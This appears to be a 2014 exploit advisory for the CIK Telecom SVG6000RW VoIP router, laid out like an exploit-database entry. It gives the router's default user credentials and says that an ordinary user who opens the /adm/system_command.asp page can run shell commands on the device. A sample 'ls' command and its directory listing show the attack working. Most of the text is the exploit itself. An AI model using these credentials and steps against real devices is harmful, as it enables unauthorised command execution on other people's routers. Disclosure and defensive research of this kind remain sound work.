56 lines
No EOL
933 B
Text
56 lines
No EOL
933 B
Text
####################################################################
|
|
#
|
|
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
|
|
# Date: 2014/12/10
|
|
# Exploit Author: Chako
|
|
# Vendor Homepage: https://www.ciktel.com/
|
|
#
|
|
####################################################################
|
|
|
|
Description:
|
|
CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie
|
|
and can lead to Command Execution.
|
|
|
|
|
|
Exploit:
|
|
|
|
1) Login as a normal user
|
|
Default Username: User Password:cikvoip
|
|
|
|
2) change URL to http://URL/adm/system_command.asp
|
|
and now u can run commands.
|
|
|
|
|
|
Example:
|
|
|
|
Command: ls /etc_rw/web
|
|
|
|
Result:
|
|
|
|
internet
|
|
cgi-bin
|
|
homemode_conf.asp
|
|
menu-en.swf
|
|
wireless
|
|
md5.js
|
|
hotelmode_conf.asp
|
|
waitAndReboot.asp
|
|
graphics
|
|
menu.swf
|
|
getMac.asp
|
|
quickconfig.asp
|
|
javascript
|
|
firewall
|
|
home.asp
|
|
customermode_conf.asp
|
|
wait.asp
|
|
station
|
|
login.asp
|
|
main.css
|
|
overview.asp
|
|
style
|
|
voip
|
|
lang
|
|
wps
|
|
usb
|
|
adm |